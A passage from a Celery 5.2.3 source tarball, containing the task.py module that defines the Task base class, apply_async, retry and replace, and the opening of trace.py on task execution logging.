celery-5.2.3/celery/app/task.py0000664000175000017500000012120400000000000016254 0ustar00asifasif00000000000000"""Task implementation: request context and the task base class.""" import sys from billiard.einfo import ExceptionInfo from kombu import serialization from kombu.exceptions import OperationalError from kombu.utils.uuid import uuid from celery import current_app, states from celery._state import _task_stack from celery.canvas import _chain, group, signature from celery.exceptions import (Ignore, ImproperlyConfigured, MaxRetriesExceededError, Reject, Retry) from celery.local import class_property from celery.result import EagerResult, denied_join_result from celery.utils import abstract from celery.utils.functional import mattrgetter, maybe_list from celery.utils.imports import instantiate from celery.utils.nodenames import gethostname from celery.utils.serialization import raise_with_context from .annotations import resolve_all as resolve_all_annotations from .registry import _unpickle_task_v2 from .utils import appstr __all__ = ('Context', 'Task') #: extracts attributes related to publishing a message from an object. extract_exec_options = mattrgetter( 'queue', 'routing_key', 'exchange', 'priority', 'expires', 'serializer', 'delivery_mode', 'compression', 'time_limit', 'soft_time_limit', 'immediate', 'mandatory', # imm+man is deprecated ) # We take __repr__ very seriously around here ;) R_BOUND_TASK = '' R_UNBOUND_TASK = '' R_INSTANCE = '<@task: {0.name} of {app}{flags}>' #: Here for backwards compatibility as tasks no longer use a custom meta-class. 
TaskType = type def _strflags(flags, default=''): if flags: return ' ({})'.format(', '.join(flags)) return default def _reprtask(task, fmt=None, flags=None): flags = list(flags) if flags is not None else [] flags.append('v2 compatible') if task.__v2_compat__ else None if not fmt: fmt = R_BOUND_TASK if task._app else R_UNBOUND_TASK return fmt.format( task, flags=_strflags(flags), app=appstr(task._app) if task._app else None, ) class Context: """Task request variables (Task.request).""" _children = None # see property _protected = 0 args = None callbacks = None called_directly = True chain = None chord = None correlation_id = None delivery_info = None errbacks = None eta = None expires = None group = None group_index = None headers = None hostname = None id = None ignore_result = False is_eager = False kwargs = None logfile = None loglevel = None origin = None parent_id = None properties = None retries = 0 reply_to = None replaced_task_nesting = 0 root_id = None shadow = None taskset = None # compat alias to group timelimit = None utc = None def __init__(self, *args, **kwargs): self.update(*args, **kwargs) def update(self, *args, **kwargs): return self.__dict__.update(*args, **kwargs) def clear(self): return self.__dict__.clear() def get(self, key, default=None): return getattr(self, key, default) def __repr__(self): return f'' def as_execution_options(self): limit_hard, limit_soft = self.timelimit or (None, None) return { 'task_id': self.id, 'root_id': self.root_id, 'parent_id': self.parent_id, 'group_id': self.group, 'group_index': self.group_index, 'shadow': self.shadow, 'chord': self.chord, 'chain': self.chain, 'link': self.callbacks, 'link_error': self.errbacks, 'expires': self.expires, 'soft_time_limit': limit_soft, 'time_limit': limit_hard, 'headers': self.headers, 'retries': self.retries, 'reply_to': self.reply_to, 'replaced_task_nesting': self.replaced_task_nesting, 'origin': self.origin, } @property def children(self): # children must be an empty list for every thread if self._children is None: self._children = [] return self._children @abstract.CallableTask.register class Task: """Task base class. Note: When called tasks apply the :meth:`run` method. This method must be defined by all tasks (that is unless the :meth:`__call__` method is overridden). """ __trace__ = None __v2_compat__ = False # set by old base in celery.task.base MaxRetriesExceededError = MaxRetriesExceededError OperationalError = OperationalError #: Execution strategy used, or the qualified name of one. Strategy = 'celery.worker.strategy:default' #: Request class used, or the qualified name of one. Request = 'celery.worker.request:Request' #: The application instance associated with this task class. _app = None #: Name of the task. name = None #: Enable argument checking. #: You can set this to false if you don't want the signature to be #: checked when calling the task. #: Defaults to :attr:`app.strict_typing <@Celery.strict_typing>`. typing = None #: Maximum number of retries before giving up. If set to :const:`None`, #: it will **never** stop retrying. max_retries = 3 #: Default time in seconds before a retry of the task should be #: executed. 3 minutes by default. default_retry_delay = 3 * 60 #: Rate limit for this task type. Examples: :const:`None` (no rate #: limit), `'100/s'` (hundred tasks a second), `'100/m'` (hundred tasks #: a minute),`'100/h'` (hundred tasks an hour) rate_limit = None #: If enabled the worker won't store task state and return values #: for this task. 
Defaults to the :setting:`task_ignore_result` #: setting. ignore_result = None #: If enabled the request will keep track of subtasks started by #: this task, and this information will be sent with the result #: (``result.children``). trail = True #: If enabled the worker will send monitoring events related to #: this task (but only if the worker is configured to send #: task related events). #: Note that this has no effect on the task-failure event case #: where a task is not registered (as it will have no task class #: to check this flag). send_events = True #: When enabled errors will be stored even if the task is otherwise #: configured to ignore results. store_errors_even_if_ignored = None #: The name of a serializer that are registered with #: :mod:`kombu.serialization.registry`. Default is `'json'`. serializer = None #: Hard time limit. #: Defaults to the :setting:`task_time_limit` setting. time_limit = None #: Soft time limit. #: Defaults to the :setting:`task_soft_time_limit` setting. soft_time_limit = None #: The result store backend used for this task. backend = None #: If enabled the task will report its status as 'started' when the task #: is executed by a worker. Disabled by default as the normal behavior #: is to not report that level of granularity. Tasks are either pending, #: finished, or waiting to be retried. #: #: Having a 'started' status can be useful for when there are long #: running tasks and there's a need to report what task is currently #: running. #: #: The application default can be overridden using the #: :setting:`task_track_started` setting. track_started = None #: When enabled messages for this task will be acknowledged **after** #: the task has been executed, and not *just before* (the #: default behavior). #: #: Please note that this means the task may be executed twice if the #: worker crashes mid execution. #: #: The application default can be overridden with the #: :setting:`task_acks_late` setting. acks_late = None #: When enabled messages for this task will be acknowledged even if it #: fails or times out. #: #: Configuring this setting only applies to tasks that are #: acknowledged **after** they have been executed and only if #: :setting:`task_acks_late` is enabled. #: #: The application default can be overridden with the #: :setting:`task_acks_on_failure_or_timeout` setting. acks_on_failure_or_timeout = None #: Even if :attr:`acks_late` is enabled, the worker will #: acknowledge tasks when the worker process executing them abruptly #: exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). #: #: Setting this to true allows the message to be re-queued instead, #: so that the task will execute again by the same worker, or another #: worker. #: #: Warning: Enabling this can cause message loops; make sure you know #: what you're doing. reject_on_worker_lost = None #: Tuple of expected exceptions. #: #: These are errors that are expected in normal operation #: and that shouldn't be regarded as a real error by the worker. #: Currently this means that the state will be updated to an error #: state, but the worker won't log the event as an error. throws = () #: Default task expiry time. expires = None #: Default task priority. priority = None #: Max length of result representation used in logs and events. resultrepr_maxsize = 1024 #: Task request stack, the current request will be the topmost. request_stack = None #: Some may expect a request to exist even if the task hasn't been #: called. This should probably be deprecated. 
_default_request = None #: Deprecated attribute ``abstract`` here for compatibility. abstract = True _exec_options = None __bound__ = False from_config = ( ('serializer', 'task_serializer'), ('rate_limit', 'task_default_rate_limit'), ('priority', 'task_default_priority'), ('track_started', 'task_track_started'), ('acks_late', 'task_acks_late'), ('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'), ('reject_on_worker_lost', 'task_reject_on_worker_lost'), ('ignore_result', 'task_ignore_result'), ('store_eager_result', 'task_store_eager_result'), ('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'), ) _backend = None # set by backend property. # - Tasks are lazily bound, so that configuration is not set # - until the task is actually used @classmethod def bind(cls, app): was_bound, cls.__bound__ = cls.__bound__, True cls._app = app conf = app.conf cls._exec_options = None # clear option cache if cls.typing is None: cls.typing = app.strict_typing for attr_name, config_name in cls.from_config: if getattr(cls, attr_name, None) is None: setattr(cls, attr_name, conf[config_name]) # decorate with annotations from config. if not was_bound: cls.annotate() from celery.utils.threads import LocalStack cls.request_stack = LocalStack() # PeriodicTask uses this to add itself to the PeriodicTask schedule. cls.on_bound(app) return app @classmethod def on_bound(cls, app): """Called when the task is bound to an app. Note: This class method can be defined to do additional actions when the task class is bound to an app. """ @classmethod def _get_app(cls): if cls._app is None: cls._app = current_app if not cls.__bound__: # The app property's __set__ method is not called # if Task.app is set (on the class), so must bind on use. cls.bind(cls._app) return cls._app app = class_property(_get_app, bind) @classmethod def annotate(cls): for d in resolve_all_annotations(cls.app.annotations, cls): for key, value in d.items(): if key.startswith('@'): cls.add_around(key[1:], value) else: setattr(cls, key, value) @classmethod def add_around(cls, attr, around): orig = getattr(cls, attr) if getattr(orig, '__wrapped__', None): orig = orig.__wrapped__ meth = around(orig) meth.__wrapped__ = orig setattr(cls, attr, meth) def __call__(self, *args, **kwargs): _task_stack.push(self) self.push_request(args=args, kwargs=kwargs) try: return self.run(*args, **kwargs) finally: self.pop_request() _task_stack.pop() def __reduce__(self): # - tasks are pickled into the name of the task only, and the receiver # - simply grabs it from the local registry. # - in later versions the module of the task is also included, # - and the receiving side tries to import that module so that # - it will work even if the task hasn't been registered. mod = type(self).__module__ mod = mod if mod and mod in sys.modules else None return (_unpickle_task_v2, (self.name, mod), None) def run(self, *args, **kwargs): """The body of the task executed by workers.""" raise NotImplementedError('Tasks must define the run method.') def start_strategy(self, app, consumer, **kwargs): return instantiate(self.Strategy, self, app, consumer, **kwargs) def delay(self, *args, **kwargs): """Star argument version of :meth:`apply_async`. Does not support the extra options enabled by :meth:`apply_async`. Arguments: *args (Any): Positional arguments passed on to the task. **kwargs (Any): Keyword arguments passed on to the task. Returns: celery.result.AsyncResult: Future promise. 
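
        Example:
            A hedged sketch; ``add`` is a hypothetical task registered
            with the app:

            >>> add.delay(2, 2)    # same as add.apply_async((2, 2))
            <AsyncResult: ...>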
""" return self.apply_async(args, kwargs) def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, shadow=None, **options): """Apply tasks asynchronously by sending a message. Arguments: args (Tuple): The positional arguments to pass on to the task. kwargs (Dict): The keyword arguments to pass on to the task. countdown (float): Number of seconds into the future that the task should execute. Defaults to immediate execution. eta (~datetime.datetime): Absolute time and date of when the task should be executed. May not be specified if `countdown` is also supplied. expires (float, ~datetime.datetime): Datetime or seconds in the future for the task should expire. The task won't be executed after the expiration time. shadow (str): Override task name used in logs/monitoring. Default is retrieved from :meth:`shadow_name`. connection (kombu.Connection): Re-use existing broker connection instead of acquiring one from the connection pool. retry (bool): If enabled sending of the task message will be retried in the event of connection loss or failure. Default is taken from the :setting:`task_publish_retry` setting. Note that you need to handle the producer/connection manually for this to work. retry_policy (Mapping): Override the retry policy used. See the :setting:`task_publish_retry_policy` setting. time_limit (int): If set, overrides the default time limit. soft_time_limit (int): If set, overrides the default soft time limit. queue (str, kombu.Queue): The queue to route the task to. This must be a key present in :setting:`task_queues`, or :setting:`task_create_missing_queues` must be enabled. See :ref:`guide-routing` for more information. exchange (str, kombu.Exchange): Named custom exchange to send the task to. Usually not used in combination with the ``queue`` argument. routing_key (str): Custom routing key used to route the task to a worker server. If in combination with a ``queue`` argument only used to specify custom routing keys to topic exchanges. priority (int): The task priority, a number between 0 and 9. Defaults to the :attr:`priority` attribute. serializer (str): Serialization method to use. Can be `pickle`, `json`, `yaml`, `msgpack` or any custom serialization method that's been registered with :mod:`kombu.serialization.registry`. Defaults to the :attr:`serializer` attribute. compression (str): Optional compression method to use. Can be one of ``zlib``, ``bzip2``, or any custom compression methods registered with :func:`kombu.compression.register`. Defaults to the :setting:`task_compression` setting. link (Signature): A single, or a list of tasks signatures to apply if the task returns successfully. link_error (Signature): A single, or a list of task signatures to apply if an error occurs while executing the task. producer (kombu.Producer): custom producer to use when publishing the task. add_to_parent (bool): If set to True (default) and the task is applied while executing another task, then the result will be appended to the parent tasks ``request.children`` attribute. Trailing can also be disabled by default using the :attr:`trail` attribute ignore_result (bool): If set to `False` (default) the result of a task will be stored in the backend. If set to `True` the result will not be stored. This can also be set using the :attr:`ignore_result` in the `app.task` decorator. publisher (kombu.Producer): Deprecated alias to ``producer``. headers (Dict): Message headers to be included in the message. 
Returns: celery.result.AsyncResult: Promise of future evaluation. Raises: TypeError: If not enough arguments are passed, or too many arguments are passed. Note that signature checks may be disabled by specifying ``@task(typing=False)``. kombu.exceptions.OperationalError: If a connection to the transport cannot be made, or if the connection is lost. Note: Also supports all keyword arguments supported by :meth:`kombu.Producer.publish`. """ if self.typing: try: check_arguments = self.__header__ except AttributeError: # pragma: no cover pass else: check_arguments(*(args or ()), **(kwargs or {})) if self.__v2_compat__: shadow = shadow or self.shadow_name(self(), args, kwargs, options) else: shadow = shadow or self.shadow_name(args, kwargs, options) preopts = self._get_exec_options() options = dict(preopts, **options) if options else preopts options.setdefault('ignore_result', self.ignore_result) if self.priority: options.setdefault('priority', self.priority) app = self._get_app() if app.conf.task_always_eager: with app.producer_or_acquire(producer) as eager_producer: serializer = options.get('serializer') if serializer is None: if eager_producer.serializer: serializer = eager_producer.serializer else: serializer = app.conf.task_serializer body = args, kwargs content_type, content_encoding, data = serialization.dumps( body, serializer, ) args, kwargs = serialization.loads( data, content_type, content_encoding, accept=[content_type] ) with denied_join_result(): return self.apply(args, kwargs, task_id=task_id or uuid(), link=link, link_error=link_error, **options) else: return app.send_task( self.name, args, kwargs, task_id=task_id, producer=producer, link=link, link_error=link_error, result_cls=self.AsyncResult, shadow=shadow, task_type=self, **options ) def shadow_name(self, args, kwargs, options): """Override for custom task name in worker logs/monitoring. Example: .. code-block:: python from celery.utils.imports import qualname def shadow_name(task, args, kwargs, options): return qualname(args[0]) @app.task(shadow_name=shadow_name, serializer='pickle') def apply_function_async(fun, *args, **kwargs): return fun(*args, **kwargs) Arguments: args (Tuple): Task positional arguments. kwargs (Dict): Task keyword arguments. options (Dict): Task execution options. """ def signature_from_request(self, request=None, args=None, kwargs=None, queue=None, **extra_options): request = self.request if request is None else request args = request.args if args is None else args kwargs = request.kwargs if kwargs is None else kwargs options = request.as_execution_options() delivery_info = request.delivery_info or {} priority = delivery_info.get('priority') if priority is not None: options['priority'] = priority if queue: options['queue'] = queue else: exchange = delivery_info.get('exchange') routing_key = delivery_info.get('routing_key') if exchange == '' and routing_key: # sent to anon-exchange options['queue'] = routing_key else: options.update(delivery_info) return self.signature( args, kwargs, options, type=self, **extra_options ) subtask_from_request = signature_from_request # XXX compat def retry(self, args=None, kwargs=None, exc=None, throw=True, eta=None, countdown=None, max_retries=None, **options): """Retry the task, adding it to the back of the queue. Example: >>> from imaginary_twitter_lib import Twitter >>> from proj.celery import app >>> @app.task(bind=True) ... def tweet(self, auth, message): ... twitter = Twitter(oauth=auth) ... try: ... twitter.post_status_update(message) ... 
except twitter.FailWhale as exc: ... # Retry in 5 minutes. ... self.retry(countdown=60 * 5, exc=exc) Note: Although the task will never return above as `retry` raises an exception to notify the worker, we use `raise` in front of the retry to convey that the rest of the block won't be executed. Arguments: args (Tuple): Positional arguments to retry with. kwargs (Dict): Keyword arguments to retry with. exc (Exception): Custom exception to report when the max retry limit has been exceeded (default: :exc:`~@MaxRetriesExceededError`). If this argument is set and retry is called while an exception was raised (``sys.exc_info()`` is set) it will attempt to re-raise the current exception. If no exception was raised it will raise the ``exc`` argument provided. countdown (float): Time in seconds to delay the retry for. eta (~datetime.datetime): Explicit time and date to run the retry at. max_retries (int): If set, overrides the default retry limit for this execution. Changes to this parameter don't propagate to subsequent task retry attempts. A value of :const:`None`, means "use the default", so if you want infinite retries you'd have to set the :attr:`max_retries` attribute of the task to :const:`None` first. time_limit (int): If set, overrides the default time limit. soft_time_limit (int): If set, overrides the default soft time limit. throw (bool): If this is :const:`False`, don't raise the :exc:`~@Retry` exception, that tells the worker to mark the task as being retried. Note that this means the task will be marked as failed if the task raises an exception, or successful if it returns after the retry call. **options (Any): Extra options to pass on to :meth:`apply_async`. Raises: celery.exceptions.Retry: To tell the worker that the task has been re-sent for retry. This always happens, unless the `throw` keyword argument has been explicitly set to :const:`False`, and is considered normal operation. """ request = self.request retries = request.retries + 1 if max_retries is not None: self.override_max_retries = max_retries max_retries = self.max_retries if max_retries is None else max_retries # Not in worker or emulated by (apply/always_eager), # so just raise the original exception. if request.called_directly: # raises orig stack if PyErr_Occurred, # and augments with exc' if that argument is defined. raise_with_context(exc or Retry('Task can be retried', None)) if not eta and countdown is None: countdown = self.default_retry_delay is_eager = request.is_eager S = self.signature_from_request( request, args, kwargs, countdown=countdown, eta=eta, retries=retries, **options ) if max_retries is not None and retries > max_retries: if exc: # On Py3: will augment any current exception with # the exc' argument provided (raise exc from orig) raise_with_context(exc) raise self.MaxRetriesExceededError( "Can't retry {}[{}] args:{} kwargs:{}".format( self.name, request.id, S.args, S.kwargs ), task_args=S.args, task_kwargs=S.kwargs ) ret = Retry(exc=exc, when=eta or countdown, is_eager=is_eager, sig=S) if is_eager: # if task was executed eagerly using apply(), # then the retry must also be executed eagerly in apply method if throw: raise ret return ret try: S.apply_async() except Exception as exc: raise Reject(exc, requeue=False) if throw: raise ret return ret def apply(self, args=None, kwargs=None, link=None, link_error=None, task_id=None, retries=None, throw=None, logfile=None, loglevel=None, headers=None, **options): """Execute this task locally, by blocking until the task returns. 
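
        This is also what :meth:`apply_async` falls back to when
        :setting:`task_always_eager` is enabled.  A hedged sketch, where
        ``add`` is a hypothetical task:

        .. code-block:: python

            res = add.apply((2, 2))    # runs inline, returns an EagerResult
            res.get()                  # -> 4, no broker round-trip involved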
Arguments: args (Tuple): positional arguments passed on to the task. kwargs (Dict): keyword arguments passed on to the task. throw (bool): Re-raise task exceptions. Defaults to the :setting:`task_eager_propagates` setting. Returns: celery.result.EagerResult: pre-evaluated result. """ # trace imports Task, so need to import inline. from celery.app.trace import build_tracer app = self._get_app() args = args or () kwargs = kwargs or {} task_id = task_id or uuid() retries = retries or 0 if throw is None: throw = app.conf.task_eager_propagates # Make sure we get the task instance, not class. task = app._tasks[self.name] request = { 'id': task_id, 'retries': retries, 'is_eager': True, 'logfile': logfile, 'loglevel': loglevel or 0, 'hostname': gethostname(), 'callbacks': maybe_list(link), 'errbacks': maybe_list(link_error), 'headers': headers, 'ignore_result': options.get('ignore_result', False), 'delivery_info': { 'is_eager': True, 'exchange': options.get('exchange'), 'routing_key': options.get('routing_key'), 'priority': options.get('priority'), }, } tb = None tracer = build_tracer( task.name, task, eager=True, propagate=throw, app=self._get_app(), ) ret = tracer(task_id, args, kwargs, request) retval = ret.retval if isinstance(retval, ExceptionInfo): retval, tb = retval.exception, retval.traceback if isinstance(retval, Retry) and retval.sig is not None: return retval.sig.apply(retries=retries + 1) state = states.SUCCESS if ret.info is None else ret.info.state return EagerResult(task_id, retval, state, traceback=tb) def AsyncResult(self, task_id, **kwargs): """Get AsyncResult instance for the specified task. Arguments: task_id (str): Task id to get result for. """ return self._get_app().AsyncResult(task_id, backend=self.backend, task_name=self.name, **kwargs) def signature(self, args=None, *starargs, **starkwargs): """Create signature. Returns: :class:`~celery.signature`: object for this task, wrapping arguments and execution options for a single task invocation. """ starkwargs.setdefault('app', self.app) return signature(self, args, *starargs, **starkwargs) subtask = signature def s(self, *args, **kwargs): """Create signature. Shortcut for ``.s(*a, **k) -> .signature(a, k)``. """ return self.signature(args, kwargs) def si(self, *args, **kwargs): """Create immutable signature. Shortcut for ``.si(*a, **k) -> .signature(a, k, immutable=True)``. """ return self.signature(args, kwargs, immutable=True) def chunks(self, it, n): """Create a :class:`~celery.canvas.chunks` task for this task.""" from celery import chunks return chunks(self.s(), it, n, app=self.app) def map(self, it): """Create a :class:`~celery.canvas.xmap` task from ``it``.""" from celery import xmap return xmap(self.s(), it, app=self.app) def starmap(self, it): """Create a :class:`~celery.canvas.xstarmap` task from ``it``.""" from celery import xstarmap return xstarmap(self.s(), it, app=self.app) def send_event(self, type_, retry=True, retry_policy=None, **fields): """Send monitoring event message. This can be used to add custom event types in :pypi:`Flower` and other monitors. Arguments: type_ (str): Type of event, e.g. ``"task-failed"``. Keyword Arguments: retry (bool): Retry sending the message if the connection is lost. Default is taken from the :setting:`task_publish_retry` setting. retry_policy (Mapping): Retry settings. Default is taken from the :setting:`task_publish_retry_policy` setting. **fields (Any): Map containing information about the event. Must be JSON serializable. 
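
        Example:
            A hedged sketch from inside a bound task; the event type and
            the ``progress`` field are illustrative only:

            .. code-block:: python

                @app.task(bind=True)
                def import_feed(self, url):
                    self.send_event('task-progress', progress=50)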
""" req = self.request if retry_policy is None: retry_policy = self.app.conf.task_publish_retry_policy with self.app.events.default_dispatcher(hostname=req.hostname) as d: return d.send( type_, uuid=req.id, retry=retry, retry_policy=retry_policy, **fields) def replace(self, sig): """Replace this task, with a new task inheriting the task id. Execution of the host task ends immediately and no subsequent statements will be run. .. versionadded:: 4.0 Arguments: sig (Signature): signature to replace with. Raises: ~@Ignore: This is always raised when called in asynchronous context. It is best to always use ``return self.replace(...)`` to convey to the reader that the task won't continue after being replaced. """ chord = self.request.chord if 'chord' in sig.options: raise ImproperlyConfigured( "A signature replacing a task must not be part of a chord" ) if isinstance(sig, _chain) and not getattr(sig, "tasks", True): raise ImproperlyConfigured("Cannot replace with an empty chain") # Ensure callbacks or errbacks from the replaced signature are retained if isinstance(sig, group): # Groups get uplifted to a chord so that we can link onto the body sig |= self.app.tasks['celery.accumulate'].s(index=0) for callback in maybe_list(self.request.callbacks) or []: sig.link(callback) for errback in maybe_list(self.request.errbacks) or []: sig.link_error(errback) # If the replacement signature is a chain, we need to push callbacks # down to the final task so they run at the right time even if we # proceed to link further tasks from the original request below if isinstance(sig, _chain) and "link" in sig.options: final_task_links = sig.tasks[-1].options.setdefault("link", []) final_task_links.extend(maybe_list(sig.options["link"])) # We need to freeze the replacement signature with the current task's # ID to ensure that we don't disassociate it from the existing task IDs # which would break previously constructed results objects. sig.freeze(self.request.id) # Ensure the important options from the original signature are retained replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1 sig.set( chord=chord, group_id=self.request.group, group_index=self.request.group_index, root_id=self.request.root_id, replaced_task_nesting=replaced_task_nesting ) # If the task being replaced is part of a chain, we need to re-create # it with the replacement signature - these subsequent tasks will # retain their original task IDs as well for t in reversed(self.request.chain or []): sig |= signature(t, app=self.app) # Finally, either apply or delay the new signature! if self.request.is_eager: return sig.apply().get() else: sig.delay() raise Ignore('Replaced by new task') def add_to_chord(self, sig, lazy=False): """Add signature to the chord the current task is a member of. .. versionadded:: 4.0 Currently only supported by the Redis result backend. Arguments: sig (Signature): Signature to extend chord with. lazy (bool): If enabled the new task won't actually be called, and ``sig.delay()`` must be called manually. """ if not self.request.chord: raise ValueError('Current task is not member of any chord') sig.set( group_id=self.request.group, group_index=self.request.group_index, chord=self.request.chord, root_id=self.request.root_id, ) result = sig.freeze() self.backend.add_to_chord(self.request.group, result) return sig.delay() if not lazy else sig def update_state(self, task_id=None, state=None, meta=None, **kwargs): """Update task state. Arguments: task_id (str): Id of the task to update. 
Defaults to the id of the current task. state (str): New state. meta (Dict): State meta-data. """ if task_id is None: task_id = self.request.id self.backend.store_result( task_id, meta, state, request=self.request, **kwargs) def before_start(self, task_id, args, kwargs): """Handler called before the task starts. .. versionadded:: 5.2 Arguments: task_id (str): Unique id of the task to execute. args (Tuple): Original arguments for the task to execute. kwargs (Dict): Original keyword arguments for the task to execute. Returns: None: The return value of this handler is ignored. """ def on_success(self, retval, task_id, args, kwargs): """Success handler. Run by the worker if the task executes successfully. Arguments: retval (Any): The return value of the task. task_id (str): Unique id of the executed task. args (Tuple): Original arguments for the executed task. kwargs (Dict): Original keyword arguments for the executed task. Returns: None: The return value of this handler is ignored. """ def on_retry(self, exc, task_id, args, kwargs, einfo): """Retry handler. This is run by the worker when the task is to be retried. Arguments: exc (Exception): The exception sent to :meth:`retry`. task_id (str): Unique id of the retried task. args (Tuple): Original arguments for the retried task. kwargs (Dict): Original keyword arguments for the retried task. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def on_failure(self, exc, task_id, args, kwargs, einfo): """Error handler. This is run by the worker when the task fails. Arguments: exc (Exception): The exception raised by the task. task_id (str): Unique id of the failed task. args (Tuple): Original arguments for the task that failed. kwargs (Dict): Original keyword arguments for the task that failed. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def after_return(self, status, retval, task_id, args, kwargs, einfo): """Handler called after the task returns. Arguments: status (str): Current task state. retval (Any): Task return value/exception. task_id (str): Unique id of the task. args (Tuple): Original arguments for the task. kwargs (Dict): Original keyword arguments for the task. einfo (~billiard.einfo.ExceptionInfo): Exception information. Returns: None: The return value of this handler is ignored. """ def add_trail(self, result): if self.trail: self.request.children.append(result) return result def push_request(self, *args, **kwargs): self.request_stack.push(Context(*args, **kwargs)) def pop_request(self): self.request_stack.pop() def __repr__(self): """``repr(task)``.""" return _reprtask(self, R_INSTANCE) def _get_request(self): """Get current request object.""" req = self.request_stack.top if req is None: # task was not called, but some may still expect a request # to be there, perhaps that should be deprecated. 
if self._default_request is None: self._default_request = Context() return self._default_request return req request = property(_get_request) def _get_exec_options(self): if self._exec_options is None: self._exec_options = extract_exec_options(self) return self._exec_options @property def backend(self): backend = self._backend if backend is None: return self.app.backend return backend @backend.setter def backend(self, value): self._backend = value @property def __name__(self): return self.__class__.__name__ BaseTask = Task # XXX compat alias ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/trace.py0000664000175000017500000006534500000000000016425 0ustar00asifasif00000000000000"""Trace task execution. This module defines how the task execution is traced: errors are recorded, handlers are applied and so on. """ import logging import os import sys import time from collections import namedtuple from warnings import warn from billiard.einfo import ExceptionInfo from kombu.exceptions import EncodeError from kombu.serialization import loads as loads_message from kombu.serialization import prepare_accept_content from kombu.utils.encoding import safe_repr, safe_str from celery import current_app, group, signals, states from celery._state import _task_stack from celery.app.task import Context from celery.app.task import Task as BaseTask from celery.exceptions import (BackendGetMetaError, Ignore, InvalidTaskError, Reject, Retry) from celery.result import AsyncResult from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.objects import mro_lookup from celery.utils.saferepr import saferepr from celery.utils.serialization import (get_pickleable_etype, get_pickleable_exception, get_pickled_exception) # ## --- # This is the heart of the worker, the inner loop so to speak. # It used to be split up into nice little classes and methods, # but in the end it only resulted in bad performance and horrible tracebacks, # so instead we now use one closure per task class. # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. # pylint: disable=broad-except # We know what we're doing... __all__ = ( 'TraceInfo', 'build_tracer', 'trace_task', 'setup_worker_optimizations', 'reset_worker_optimizations', ) from celery.worker.state import successful_requests logger = get_logger(__name__) #: Format string used to log task receipt. LOG_RECEIVED = """\ Task %(name)s[%(id)s] received\ """ #: Format string used to log task success. LOG_SUCCESS = """\ Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\ """ #: Format string used to log task failure. LOG_FAILURE = """\ Task %(name)s[%(id)s] %(description)s: %(exc)s\ """ #: Format string used to log task internal error. LOG_INTERNAL_ERROR = """\ Task %(name)s[%(id)s] %(description)s: %(exc)s\ """ #: Format string used to log task ignored. LOG_IGNORED = """\ Task %(name)s[%(id)s] %(description)s\ """ #: Format string used to log task rejected. LOG_REJECTED = """\ Task %(name)s[%(id)s] %(exc)s\ """ #: Format string used to log task retry. 
LOG_RETRY = """\ Task %(name)s[%(id)s] retry: %(exc)s\ """ log_policy_t = namedtuple( 'log_policy_t', ('format', 'description', 'severity', 'traceback', 'mail'), ) log_policy_reject = log_policy_t(LOG_REJECTED, 'rejected', logging.WARN, 1, 1) log_policy_ignore = log_policy_t(LOG_IGNORED, 'ignored', logging.INFO, 0, 0) log_policy_internal = log_policy_t( LOG_INTERNAL_ERROR, 'INTERNAL ERROR', logging.CRITICAL, 1, 1, ) log_policy_expected = log_policy_t( LOG_FAILURE, 'raised expected', logging.INFO, 0, 0, ) log_policy_unexpected = log_policy_t( LOG_FAILURE, 'raised unexpected', logging.ERROR, 1, 1, ) send_prerun = signals.task_prerun.send send_postrun = signals.task_postrun.send send_success = signals.task_success.send STARTED = states.STARTED SUCCESS = states.SUCCESS IGNORED = states.IGNORED REJECTED = states.REJECTED RETRY = states.RETRY FAILURE = states.FAILURE EXCEPTION_STATES = states.EXCEPTION_STATES IGNORE_STATES = frozenset({IGNORED, RETRY, REJECTED}) #: set by :func:`setup_worker_optimizations` _localized = [] _patched = {} trace_ok_t = namedtuple('trace_ok_t', ('retval', 'info', 'runtime', 'retstr')) def info(fmt, context): """Log 'fmt % context' with severity 'INFO'. 'context' is also passed in extra with key 'data' for custom handlers. """ logger.info(fmt, context, extra={'data': context}) def task_has_custom(task, attr): """Return true if the task overrides ``attr``.""" return mro_lookup(task.__class__, attr, stop={BaseTask, object}, monkey_patched=['celery.app.task']) def get_log_policy(task, einfo, exc): if isinstance(exc, Reject): return log_policy_reject elif isinstance(exc, Ignore): return log_policy_ignore elif einfo.internal: return log_policy_internal else: if task.throws and isinstance(exc, task.throws): return log_policy_expected return log_policy_unexpected def get_task_name(request, default): """Use 'shadow' in request for the task name if applicable.""" # request.shadow could be None or an empty string. # If so, we should use default. return getattr(request, 'shadow', None) or default class TraceInfo: """Information about task execution.""" __slots__ = ('state', 'retval') def __init__(self, state, retval=None): self.state = state self.retval = retval def handle_error_state(self, task, req, eager=False, call_errbacks=True): if task.ignore_result: store_errors = task.store_errors_even_if_ignored elif eager and task.store_eager_result: store_errors = True else: store_errors = not eager return { RETRY: self.handle_retry, FAILURE: self.handle_failure, }[self.state](task, req, store_errors=store_errors, call_errbacks=call_errbacks) def handle_reject(self, task, req, **kwargs): self._log_error(task, req, ExceptionInfo()) def handle_ignore(self, task, req, **kwargs): self._log_error(task, req, ExceptionInfo()) def handle_retry(self, task, req, store_errors=True, **kwargs): """Handle retry exception.""" # the exception raised is the Retry semi-predicate, # and it's exc' attribute is the original exception raised (if any). 
